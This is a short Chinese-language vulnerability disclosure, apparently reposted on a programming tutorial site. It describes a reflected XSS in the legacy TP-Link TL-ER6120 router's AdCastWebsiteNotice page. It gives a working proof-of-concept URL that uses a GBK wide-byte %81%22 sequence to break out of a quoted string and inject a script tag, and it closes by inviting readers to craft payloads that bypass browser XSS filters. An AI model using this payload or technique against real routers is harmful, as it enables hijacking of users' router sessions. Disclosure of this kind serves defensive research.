好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

TP-Link路由器 反射xss一枚 - 网站安全 - 自学php

这个是针对老版的tp-link

当前软件版本:1.2.1 Build 20130604 Rel.31975 当前硬件版本:TL-ER6120 v1.0 我觉得要换路由器了 – - 这路由器太老了 对于那种需要401认证输入密码的 就不行 进个网站,路由器限制了

 

<script language=JavaScript> var OptValue = new Array( "HdhCmsTestbaidu测试数据", "", 0, 0,0 ); </script>

由图片可以看出字符编码为GBK,你懂的,宽字节绕过 地址栏输入 %81%22 即可闭合双引号。接下来你懂的 测试浏览器 firefox

http://192.168.0.1/userRpm/AdCastWebsiteNotice.htm?orgUrl=%81%22%29;%3C/script%3E%3Cscript%3Ealert%28%27Leesec%27%29;%3C/script%3E

IE 和 GOOGLE 浏览器 有XSS Filter,大家可以自己构造XSS代码,绕过XSS Filter,进行攻击

查看更多关于TP-Link路由器 反射xss一枚 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14865
  阅读:44次

上一篇: zcncms网站管理系统 v1.2.14 最新未授权访问/敏感信

下一篇:有效防范PHP木马的方法 - 网站安全 - 自学php

相关资讯